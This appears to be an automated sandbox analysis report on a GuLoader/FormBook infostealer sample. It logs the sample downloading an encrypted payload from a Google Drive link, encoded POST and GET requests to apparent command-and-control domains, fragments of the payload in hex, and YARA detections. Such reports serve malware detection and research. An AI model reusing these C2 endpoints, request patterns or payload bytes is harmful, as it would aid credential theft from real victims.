                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.globalworld-travel.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=IrqYfbxTJNdcFG7mvQ5zLfox8nPSh3+XVfSzBiNYk0kpgyX1xsPwLID1oJ/VZ2S7WSUpsbazTBCp9d9AzehFBXEasiHfWjv6AHrFljAPUSS43vM4IiSwDN1N55n0JI0lheWU/CMkJOLB2OUcwMBC1hYKAmfhYUAQW5IAvYhrNOR1UEgP5892kqG8XGlwpDvpBCm9j0ONYMzS6yzGwPT1KzA=
                                                                                    Mar 18, 2024 15:10:51.627295017 CET | 678 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                    Date: Mon, 18 Mar 2024 14:10:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                    referer-policy: same-origin
                                                                                    set-cookie: o2s-chl=3740ae8a9502784d81db4ef0b2b153c8; domain=.globalworld-travel.com; expires=Tue, 19-Mar-24 14:10:51 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                    location: http://www.globalworld-travel.com/v3ka/
                                                                                    tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                    Server: o2switch-PowerBoost-v3
                                                                                    Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 10


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
35  192.168.11.30  49846  109.234.166.81  80  6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
Timestamp  Bytes transferred  Direction  Data
Mar 18, 2024 15:10:54.155198097 CET  1691  OUT  POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Origin: http://www.globalworld-travel.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.globalworld-travel.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Mar 18, 2024 15:10:54.328897953 CET  678  IN  HTTP/1.1 307 Temporary Redirect
                                                                                    Date: Mon, 18 Mar 2024 14:10:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                    referer-policy: same-origin
                                                                                    set-cookie: o2s-chl=3740ae8a9502784d81db4ef0b2b153c8; domain=.globalworld-travel.com; expires=Tue, 19-Mar-24 14:10:54 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                    location: http://www.globalworld-travel.com/v3ka/
                                                                                    tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                    Server: o2switch-PowerBoost-v3
                                                                                    Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 10


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
36  192.168.11.30  49847  109.234.166.81  80  6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
Timestamp  Bytes transferred  Direction  Data
Mar 18, 2024 15:10:56.860553026 CET  468  OUT  GET /v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Mar 18, 2024 15:11:03.898165941 CET  492  IN  HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 14:11:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-Redirect-By: WordPress
                                                                                    Location: http://globalworld-travel.com/v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN
                                                                                    Server: o2switch-PowerBoost-v3


Session ID  Source IP  Source Port  Destination IP  Destination Port
37  192.168.11.30  49852  172.67.130.3  80
Timestamp  Bytes transferred  Direction  Data
Mar 18, 2024 15:14:44.917244911 CET  721  OUT  POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.wbyzm5.buzz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=0B6keA8ypMVPmT5NQh5uX7w/pI6/nIC5Dx/HhXYLdwSIRf7GObKDEuQUGwp6u89XjSsoPdQc6YYqTh0MREtDcqhcfSniXvJKs8QEg/INduap0CubzzWNgIKg5/RTDaNIhGg1G4bNLSQz5Heb+dvaE9uw2yV+o8v7CAPJURLtduP4/jH7/oglr/rd5nGkvkuDJA==
Mar 18, 2024 15:14:45.057276964 CET  656  IN  HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 14:14:45 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 15:14:44 GMT
                                                                                    Location: https://www.wbyzm5.buzz/v3ka/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDsp9DIZ0qNnx8eHGLSX%2Bcnfxw4BsJS2Jaac1Fdz844Qr4qtSk9rktQONt9jdR%2FsrYQn1VTb5ob2a6nnbe22GaBJdzawXSF9H8jj5hz2PaPCTZTJ8JG7ZHFaLcDvTYAb2Pg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665d4b30abe43bc-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.11.30  49803  142.250.65.174  443  8924  C:\Users\user\Desktop\cuenta para pago1.exe
Timestamp  Bytes transferred  Direction  Data
2024-03-18 14:06:51 UTC  216  OUT  GET /uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
2024-03-18 14:06:51 UTC  1582  IN  HTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Mon, 18 Mar 2024 14:06:51 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Content-Security-Policy: script-src 'nonce-Nu0xs6qQoa-KZ3lI09n6cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.11.30  49804  142.251.41.1  443  8924  C:\Users\user\Desktop\cuenta para pago1.exe
Timestamp  Bytes transferred  Direction  Data
2024-03-18 14:06:51 UTC  258  OUT  GET /download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
2024-03-18 14:06:52 UTC  4680  IN  HTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ABPtcPoseuhZjVTmYh8IWp-2EfNDuIrnKpXEcEt__QJD6-E4lVfioFhmsf-q2KNCVoBdygXlDyw
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="OJZITJt84.bin"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, 
X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 273984
                                                                                    Last-Modified: Tue, 12 Mar 2024 11:43:36 GMT
                                                                                    Date: Mon, 18 Mar 2024 14:06:52 GMT
                                                                                    Expires: Mon, 18 Mar 2024 14:06:52 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=YYTtyQ==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close
                                                                                    Data Ascii: d`-O?_3IbR!{De:n*>s-Zvorqx(p[Fg&.Vw@7P#:$nHSJ.`+@<iM7]{E)}A{,5_F0r/glo[[4^<QiOfiin]6>Z?83x<U{
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 03 63 96 91 4a 33 20 e7 80 c9 5a 04 8e 95 62 39 c1 b3 96 56 98 31 32 83 6a 05 7a e6 d8 41 1e 67 30 54 52 23 04 84 77 a9 a5 0f c8 1c 14 73 2a a5 9f c7 ff 2c 0c 9e 86 2a 2b ed 77 34 88 c2 c6 92 a0 24 75 c2 45 df 87 7b ff 87 bc ab 3b e9 a6 84 d6 5d 25 ed 15 0c 23 01 45 d0 0b 0a c4 32 11 73 0e 9b 08 8a a0 a7 51 6d 03 51 a5 46 1d 7b f9 c4 79 38 19 86 24 bd 00 47 eb c3 32 3e 00 4a 54 7f c3 c5 37 8a 44 c7 35 82 e9 9f 25 78 eb 11 0e 67 e9 e8 e8 c1 88 88 c0 86 41 ae a4 4d 8b 57 12 98 9b 8c 3b 2a 60 cd 47 de d0 99 1c 17 cf a3 df f7 98 3c be fc 44 2a a8 a0 aa 8f ba 1c 9b b3 ce f5 a9 fe ed 28 09 72 93 ec 53 47 2a 31 f4 af d8 85 94 03 26 0f 99 83 c8 81 ff 1a d0 7b 36 b8 7b f7 55 eb e1 13 d7 3b 76 50 d5 5b b5 34 2f b8 07 9d 36 7a 15 f0 97 b8 d3 92 22 44 1e 26 75 8c 4d
                                                                                    Data Ascii: cJ3 Zb9V12jzAg0TR#ws*,*+w4$uE{;]%#E2sQmQF{y8$G2>JT7D5%xgAMW;*`G<D*(rSG*1&{6{U;vP[4/6z"D&uM
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 36 e3 fe fb 4e 53 66 66 cb 70 31 64 0a 6b cf 12 bb a6 83 26 a2 07 56 98 fb bf 35 c5 5a d0 c7 b2 6c d8 1c 3b 12 e3 36 40 c1 03 7a 1d fd fb da 06 93 98 82 ed 82 39 73 76 eb 25 93 ae e6 3e 85 27 76 a8 83 45 42 6a 03 5c 6d 67 15 90 6c 27 73 54 eb 82 91 f7 29 fd 6d 89 80 27 d7 af dd 6d 3d 86 c1 62 f1 ac 4e d7 2f 55 9d 63 a7 1f f5 39 63 a3 bb 4f 59 a4 8a fd ab 95 f3 94 83 bd f2 28 14 60 60 12 7a 82 cf 9f fd 7c 89 43 d5 8f 9d ee 4d ea bd 56 54 a0 64 f9 ce f8 01 a5 d5 f3 c3 dc 14 81 af 1c 44 50 59 ed 2c a8 7a 70 54 10 42 79 2d d7 a9 b7 01 e6 a8 67 9c ed 45 66 af 97 4d 8a da 6d 1a 67 8a 92 e8 e7 6d 49 f9 84 bf b8 6d d0 e4 b8 61 bd f2 0e 7e b3 c4 5c 35 1b 49 b3 5e 7c 55 e9 67 75 e8 61 ed 6c bd a9 5b 79 75 a2 c5 42 1d e5 5d 0c 1e 74 d8 7f 10 3e e7 d2 d5 a6 c4 46 f9
                                                                                    Data Ascii: 6NSffp1dk&V5Zl;6@z9sv%>'vEBj\mgl'sT)m'm=bN/Uc9cOY(``z|CMVTdDPY,zpTBy-gEfMmgmIma~\5I^|Ugual[yuB]t>F
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 39 37 1d 7f 1f ce 66 46 26 99 d3 d8 76 b5 65 28 01 ac 1f b4 27 dc 64 91 1d 88 cf f7 45 cb d2 93 aa e9 dc 6f df 60 4e 6c 16 0a 54 3b d5 a5 14 04 f4 2e 62 0f 12 31 d7 5f fa b7 4d b1 92 50 91 3a 16 f7 c8 0d f8 0e ac d1 e2 46 49 bb b1 b9 99 7f 76 ab 23 9c 1c 01 63 25 3b 78 44 f6 a9 ab 6c ce 94 6b 28 6f fe e3 2b 91 ef e5 0f 2e bd c3 ca 4e 89 30 71 aa 32 3a 75 2e 70 66 de cc fe 22 a2 d8 a9 fc 08 e7 13 6d 05 75 44 2c 37 30 28 a1 d0 ad 32 ee d6 fe 34 7e 2f 8b fe 5f df a9 22 28 49 21 52 7f 76 06 3e be ec ce 12 8b c5 68 ef aa 01 86 bb 05 e5 65 9b 8f 71 90 eb be 87 95 9a 95 59 e7 8a 08 b4 ca de 27 bc 6a 66 bc 94 2b e4 7a 41 57 22 3c cd 60 0d 38 bc 79 d0 75 6c fb fb 4c e4 51 13 11 54 7c 28 2a 5c 50 47 25 33 4d a2 af 30 36 9b d3 00 99 e9 ba fa 8e 97 a7 28 14 20 aa ca
                                                                                    Data Ascii: 97fF&ve('dEo`NlT;.b1_MP:FIv#c%;xDlk(o+.N0q2:u.pf"muD,70(24~/_"(I!Rv>heqY'jf+zAW"<`8yulLQT|(*\PG%3M06(
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: 8a 30 c5 a2 3b 52 5d 36 f5 45 8c f6 12 9e d4 22 7c 03 40 a6 e0 ee c8 24 d4 ad 21 03 ab 4d 3d 55 29 50 53 32 f8 e3 28 b5 06 92 75 92 88 f5 75 3a 6e be a3 a0 7c 03 db f1 2d 79 64 fc 52 88 f1 6c a6 a5 38 07 25 7b b6 2d 0b bc 29 b4 88 8c 49 dc 39 ec 88 6e fc aa 10 f3 c9 b3 e0 d7 84 33 4a d2 e8 d2 db 09 fa 70 a0 8e 76 e1 17 07 3a c4 8a 5c 40 d8 73 06 09 d4 80 76 94 a6 45 71 f9 e0 54 53 3b 42 ed 0a bb 37 e6 46 ba 85 d4 ea 45 40 b0 cf 0c 81 a7 22 0b a6 22 ab 97 9e 8b 73 d1 6f 68 77 b2 e5 97 ef d3 5f f5 1b f8 cf 82 65 ec 44 6c 79 a3 d2 b6 b3 77 aa 94 97 1f 51 7b a2 e4 d2 da e5 ae aa e3 a0 a4 b9 42 44 b6 4e be 5c b6 99 59 fd 60 5a d4 3d 12 b6 0a c9 d7 9b 6d d6 88 69 7e d8 8f 17 23 9b dc f4 4f e3 08 6f d2 9c 6e 05 32 c0 a5 f8 b8 30 7d 0c 33 47 91 e6 7e 9e a2 6e ff
                                                                                    Data Ascii: 0;R]6E"|@$!M=U)PS2(uu:n|-ydRl8%{-)I9n3Jpv:\@svEqTS;B7FE@""sohw_eDlywQ{BDN\Y`Z=mi~#Oon20}3G~n
                                                                                    2024-03-18 14:06:52 UTC1252INData Raw: e7 0b 44 87 bd dd 96 b8 59 09 69 1d 2e 07 99 92 13 83 f1 50 39 9c 19 ac 57 91 ca 59 c8 aa 80 a6 75 47 03 47 6a 63 99 ea 51 78 ea 0a 17 dc 2c 85 8d 99 31 44 da 20 93 9d cb 78 34 cc 16 f2 7b ff a8 36 ea 43 3c 74 1e 00 1a 86 ab 8a 18 b7 d5 eb a6 8f ec 11 90 78 4b 30 43 fc ab f4 7c 03 7e 9a 29 9c aa fa fc 76 b4 cb 0f 7f 8c 88 bc 77 c3 71 01 f9 ff 67 52 c1 84 2b 1d dd 2c 5d 1f 83 51 56 8e de c1 f5 92 80 bf a8 79 7c ca 0e f1 a3 e5 09 ca f7 43 45 a2 38 77 94 e4 b2 6b f2 49 22 b8 ca 63 c4 7a 8f db 4b 9d aa f8 50 71 5e 4d 69 95 c9 d5 4b f8 f2 b0 75 cb 9f 46 0e 4e 3c 7e 99 2b 33 18 7b ae a3 3d 14 01 49 90 10 44 52 64 26 c1 87 86 a6 89 9f e2 33 5c 0c ab 0a 99 7a 9d 87 a0 02 9d e7 e2 f7 06 8e 55 55 af d5 da df ba 11 aa ea 40 9a c2 6a 1f 4e ee a9 14 46 0d 5b 95 10 6d
                                                                                    Data Ascii: DYi.P9WYuGGjcQx,1D x4{6C<txK0C|~)vwqgR+,]QVy|CE8wkI"czKPq^MiKuFN<~+3{=IDRd&3\zUU@jNF[m


                                                                                    Target ID:0
                                                                                    Start time:15:06:11
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:826'296 bytes
                                                                                    MD5 hash:93D1942C204022E792AF256D0CCBE8E5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.4059690339.0000000004F84000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:15:06:41
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:826'296 bytes
                                                                                    MD5 hash:93D1942C204022E792AF256D0CCBE8E5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.4188957643.0000000001794000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:15:06:57
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe"
                                                                                    Imagebase:0xe00000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:4
                                                                                    Start time:15:06:58
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Windows\SysWOW64\rasautou.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\rasautou.exe
                                                                                    Imagebase:0xac0000
                                                                                    File size:15'360 bytes
                                                                                    MD5 hash:DFDBEDC2ED47CBABC13CCC64E97868F3
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
